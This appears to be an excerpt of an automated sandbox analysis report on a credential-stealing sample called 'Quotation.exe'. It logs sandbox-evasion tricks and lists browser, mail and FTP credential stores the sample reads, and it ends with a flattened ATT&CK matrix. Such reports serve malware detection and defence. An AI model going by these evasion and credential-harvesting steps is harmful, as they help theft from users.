            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_372376D8 push esp; iretd 3_2_372376E9
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_37237CA4 push esp; iretd 3_2_37237CAD
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 59C5CCC
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 2425CCC
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 5968ACD second address: 5968ACD instructions: 0x00000000 rdtsc 0x00000002 cmp dl, al 0x00000004 cmp bl, 0000004Ch 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FEF74DA0F5Ch 0x0000000b test ecx, eax 0x0000000d test ebx, ebx 0x0000000f inc ebp 0x00000010 cmp bx, dx 0x00000013 inc ebx 0x00000014 test ch, ah 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 23C8ACD second address: 23C8ACD instructions: 0x00000000 rdtsc 0x00000002 cmp dl, al 0x00000004 cmp bl, 0000004Ch 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FEF744F299Ch 0x0000000b test ecx, eax 0x0000000d test ebx, ebx 0x0000000f inc ebp 0x00000010 cmp bx, dx 0x00000013 inc ebx 0x00000014 test ch, ah 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 33CC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 33920000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199562Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199234Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199124Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199015Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198906Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198797Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198687Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198578Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 8859Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 980Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeEvaded block: after key decisiongraph_0-3126
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6108Thread sleep count: 8859 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 6108Thread sleep count: 980 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -99094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -98078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -97110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -96110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -95985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -95860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1199015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1198906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1198797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1198687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 5756Thread sleep time: -1198578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99438Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99313Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99203Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99094Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98969Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98859Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98750Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98641Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98531Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98422Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98313Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98188Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98078Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97969Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97844Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97735Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97610Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97485Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97360Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97235Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97110Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96860Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96735Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96610Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96485Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96360Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96235Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96110Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95985Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 95860Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199562Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199234Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199124Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199015Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198906Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198797Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198687Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198578Jump to behavior
            Source: Quotation.exe, 00000003.00000002.3270442306.0000000003871000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3270442306.0000000003818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Quotation.exe, 00000003.00000002.3270442306.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
            Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-3017
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_733F2351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_733F2351
            Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2284, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2284, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2284, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            11
            Input Capture
            225
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS311
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
            Virtualization/Sandbox Evasion
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSH1
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
